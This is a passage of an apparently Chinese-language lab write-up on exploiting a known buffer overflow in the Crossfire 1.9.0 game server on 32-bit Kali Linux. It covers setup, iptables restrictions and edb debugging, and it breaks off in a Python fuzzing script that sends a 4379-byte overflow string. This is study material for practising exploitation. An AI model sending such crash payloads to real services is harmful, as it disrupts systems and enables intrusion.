前言
上一篇在windows下用SLMail的漏洞实现缓冲区溢出
这次在Linux下用crossfire的漏洞实现缓冲区溢出
crossfire穿越火线
- 多人在线rpg游戏
- 1.9.0版本接受入站socket连接时存在缓冲区溢出
- 新版本已经修复
这个漏洞是很早很早以前的
现在拿来学习和练手(笑)
1、实验准备
调试工具:edb-debug(kali自带)
运行平台:kali i486(32位)
crossfire准备
安装要注意路径
mv crossfire.tar.gz /usr/games/
cd /usr/games
tar zxpf crossfire.tar.gz
./crossfire
netstat -pentu #查看端口
本机准备
防止练手过程中,开放的端口被其他人攻击
iptables -A INPUT -p tcp --destination-port 13327 \~ -d 127.0.0.1 -j DROP #严格限制可以访问端口的IP
iptables -A INPUT -p tcp --destination-port 4444 \~ -d 127.0.0.1 -j DROP
调试
edb --run /usr/games/crossfire/bin/crossfire #通过edb调用crossfire
菜单栏debug下点两次run
出现小窗口监视
2、模糊测试
测试缓冲区溢出
根据已知信息
4379个字符刚好发生缓冲区溢出
(这个数据最初怎么得到的令人困惑)
脚本01.py
#!/usr/bin/python
import socket
host="127.0.0.1"
crash="\x41"*4379 #4379个"A",4379个字符刚好缓冲区溢出
buffer="\x11(setup sound "+crash+"\x90\x00#"
s=socket.socket